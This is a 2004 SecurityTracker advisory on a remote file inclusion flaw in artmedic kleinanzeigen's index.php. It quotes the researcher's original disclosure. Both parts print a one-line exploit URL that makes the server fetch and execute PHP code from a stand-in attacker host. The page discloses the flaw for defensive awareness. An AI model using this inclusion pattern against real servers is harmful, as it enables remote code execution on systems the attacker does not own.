SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Generic)  >   artmedic kleinanzeigen Vendors:   artmedic webdesign
artmedic kleinanzeigen Include File Error Lets Remote Users Execute Arbitrary Code
SecurityTracker Alert ID:  1010740
SecurityTracker URL:  http://securitytracker.com/id/1010740
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Jul 19 2004
Impact:   Execution of arbitrary code via network, User access via network
Exploit Included:  Yes  

Description:   An include file vulnerability was reported in artmedic kleinanzeigen. A remote user can execute arbitrary code on the target system.

Dominus_Vis from Infektion Group reported that a remote user can supply a specially crafted HTTP request to cause arbitrary PHP code at a remote site to be included by and executed on the target server.

A demonstration exploit URL is provided:

[target]/artmedic-kleinanzeigen-path/index.php?id=http://[evil-host]

Impact:   A remote user can execute arbitrary PHP code, including operating system commands on the target system. The code will run with the privileges of the target web service.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.artmedic-phpscripts.de/artmedic_kleinanzeigen.php (Links to External Site)
Cause:   Input validation error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  Artmedic kleinanzeigen include vulnerability




Artmedic kleinanzeigen allow code inclusion in index.php. 
 
Exploit: 
www.host.com/artmedic-kleinanzeigen-path/index.php?id=http://evil-host.com 
 
An evil attacker could be use this vulnerability to execute 
php code with the same user id of the running server. 
 
Thanks and sorry for the bad english 
Dominus_Vis from Infektion Group :> 
irc.phey.net -j #infektion 

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2019, SecurityGlobal.net LLC